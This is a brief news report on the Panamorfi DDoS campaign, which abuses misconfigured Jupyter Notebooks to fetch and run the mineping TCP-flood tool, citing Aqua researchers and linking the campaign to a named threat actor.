Cybersecurity researchers have revealed details of a new distributed denial-of-service (DDoS) attack campaign targeting misconfigured Jupyter Notebooks.
The campaign, named Panamorfi by cloud security firm Aqua, uses a Java-based tool called mineping to launch a TCP flood DDoS attack. Mineping is typically a DDoS package designed for Minecraft game servers.
The attack chain involves exploiting internet-exposed Jupyter Notebook instances to execute wget commands that fetch a ZIP archive from a file-sharing site called Filebin.
The ZIP file contains two Java archive (JAR) files, conn.jar and mineping.jar. The conn.jar file is used to establish connections to a Discord channel and trigger the execution of the mineping.jar package.
“This attack aims to consume the resources of the target server by sending a large number of TCP connection requests,” explained Aqua researcher Assaf Morag. “The results are written to the Discord channel.”
The attack campaign has been linked to a threat actor known as yawixooo, who has a GitHub account with a public repository containing a Minecraft server properties file.
This is not the first time internet-accessible Jupyter Notebooks have been targeted by adversaries. In October 2023, a Tunisian threat actor named Qubitstrike was observed breaching Jupyter Notebooks to illicitly mine cryptocurrency and infiltrate cloud environments.